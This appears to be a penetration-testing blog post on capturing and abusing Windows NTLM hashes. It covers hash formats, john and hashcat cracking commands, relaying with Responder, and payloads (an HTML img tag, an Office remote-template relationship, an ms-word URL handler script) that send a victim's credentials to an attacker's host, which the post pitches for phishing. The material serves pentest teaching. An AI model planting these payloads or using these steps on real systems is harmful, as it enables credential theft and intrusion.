Leaking NTLM Hashes

Leaking hashes is not something new, however it is still possible to do it mainly because it is a feature that is enabled by default. It is caused by a design flaw in Windows related to the user authentication. In order to achieve single sign-on implementation Windows will try to authenticate to each server with the user credentials in the form on NTLM hashes. In this post I will explain which types of NTLM hashes there are, which ones are used for pash-the-hash, how to relay hashes and some techniques to leak them.

Types of NTLM hashes

NTHash (NTLM)

This is how passwords are stored on Windows systems. This type of hash can be obtained by dumping the SAM database, or using Mimikatz. They are also stored on domain controllers in the NTDS file. These are the hashes you can use to pass-the-hash technique.

Example of NTHash:

dfdedf4b5ec0e2f9042db9ccef992507

NTHashes are stored in the Security Account Manager (SAM) database and in Domain Controller’s NTDS.dit database. A hash dump from Windows will look something like this:

Administrator:500:aad3b435b51404eeaad3b435b51404ee:dfdedf4b5ec0e2f9042db9ccef992507:::

Which has this format:

<Username>:<User ID>:<LM hash>:<NT hash>:<Comment>:<Home Dir>:

When you see the LM hash is aad3b435b51404eeaad3b435b51404ee it is the literal hash of no password and this depends on your dumping tool, you can also find this string filled with zeros. This is like this when the LM hash is empty.

How to crack them

john --format=nt hash.txt
hashcat -m 1000 -a 3 hash.txt

Net-NTLMv1/v2 a.k.a NTLMv1/v2

The Net-NTLM protocol uses the NTHash in a challenge/response between a server and a client.

You can get these hashes when using tools like Responder or Inveigh.

admin::N46iSNekpT:08ca45b7d7ea58ee:88dcbe4446168966a153a0064958dac6:5c7830315c7830310000000000000b45c67103d07d7b95acd12ffa11230e0000000052920b85f78d013c31cdb3b92f5d765c783030

How to crack them

Net-NTLMv1

john --format=netntlm hash.txt
hashcat -m 5500 -a 3 hash.txt

Net-NTLMv2

john --format=netntlmv2 hash.txt
hashcat -m 5600 -a 3 hash.txt

Relaying

Since MS08-068 relaying a Net-NTLM hash back to the same machine you got it from is not possible. However you can still relay the hash to another machine.

We will be capable of relaying intercepted authentication hashes to other machines and gaining access to them by using Responder with a relaying tool. This is only possible if SMB signing is disabled.

You can find a great guide on how to setup Responder with a relaying tool this byt3bl33d3r’s post. It is interesting how relaying can be combined with empire to gain an empire agent anytime we are able to relay a hash.

Leaking hashes

Here is a compilation of methods used for leaking hashes. This is great for phising campaings and external pentest:

Internet browsers and email templates:

    <img src="file://<responder ip>/leak/leak.png"/>

Office:

More info in Securify’s Living Off Land post

<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships">
   <Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/attachedTemplate" Target="file://<responder ip>/leak/Template.dotx" TargetMode="External"/>
</Relationships>

URL handlers:

<script>
   location.href = 'ms-word:ofe|u|\\<responder ip>\leak\leak.docx';
</script>

References